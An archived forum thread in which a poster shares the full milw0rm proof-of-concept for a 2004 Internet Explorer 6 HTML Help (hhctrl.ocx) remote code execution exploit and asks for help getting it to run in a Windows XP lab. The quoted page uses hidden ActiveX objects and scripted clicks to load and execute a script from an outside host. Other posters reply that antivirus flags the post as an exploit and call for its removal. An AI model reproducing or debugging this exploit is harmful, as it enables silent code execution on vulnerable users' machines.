Recreating Old code execution Vulnerability

D

Diogo

I'm trying to recreate an old IE 6.0 vulnerability in a windows XP-SP2 box,
for learning purposes.
I'm using VMware (XP-SP2 unpatched box).
When I browse to my index.htm page I get the following error:

"An error has occured in the script onthis page.
Line: 4
Char: 1
Error: Invalid character
Code: 0
URL: ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm
Do you want to continue running scripts on this page?"

I then punch yes but nothing happens.
This is the code behind my index.htm

"Download this file as well for your own testing: original htm.txt
http://www.milw0rm.com/down.php?id=723

//str0ke
-->

<html><head><title>CMDExe - Windows Exploit - Remote code execution with
parameters - Proof of Concept</title></head><BODY
style="font-family:Verdana;color:#0000FF;font-size:14px">More info about this
exploit can be found at <a
href="http://freehost19.websamba.com/shreddersub7/expl-discuss.htm"
target="_new">hhttp://freehost19.websamba.com/shreddersub7/expl-discuss.htm</a>. ? 2004 ShredderSub7
<script>
function DisplayLocStrings() {
Title.innerHTML = TAG_SYSCONFIG;
Config_Link.innerHTML = TAG_OPENSYSCONFIG;
Config_Desc.innerHTML = TAG_SYSCONFIGDESC;
}
</script>
<br><OBJECT style="display:none" id="locate" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"
value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm">
</OBJECT>
<OBJECT style="display:none" id="locator" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"
value='command;javascript:execScript("document.write(\"<script
language=\\\"javascript\\\"
src=\\\"http://10.10.52.20/htm.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>

</OBJECT
<script>locate.HHClick();setTimeout("locator.HHClick()",100);setTimeout("window.opener=null;window.close()",10000)</script></body></html>

// milw0rm.com [2004-12-28]"


Could someone help please.
 
D

Diogo

I know this might arouse suspicion but we are talking about a vulnerability
from 2004... no one is vulnerable to this and I doing this in VMware. I
installed an old XP-SP2 version just to try it out. :)
I'm trying to learn network security and this example came up...
I've absolutely no malicious intentions, towards anyone.
Could someone help?
 
S

Stefan B Rusynko

Your original post appears to have a virus / worm VBS/Phel.J attached
(probably because your old XP-SP2 is unpatched)
- selecting it I get an alert about the following worm
http://onecare.live.com/standard/en...eyword=avencyclopedia&name=Exploit:VBS/Phel.J

I suspect your old system is compromised

--

_____________________________________________
SBR @ ENJOY (-: [ Microsoft MVP - FrontPage ]
"Warning - Using the F1 Key will not break anything!" (-;
_____________________________________________


|I know this might arouse suspicion but we are talking about a vulnerability
| from 2004... no one is vulnerable to this and I doing this in VMware. I
| installed an old XP-SP2 version just to try it out. :)
| I'm trying to learn network security and this example came up...
| I've absolutely no malicious intentions, towards anyone.
| Could someone help?
 
R

Rob Giordano \(Crash\)

methinks he is intentionally experimenting with the black arts.

his post should be removed
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Similar Threads


Top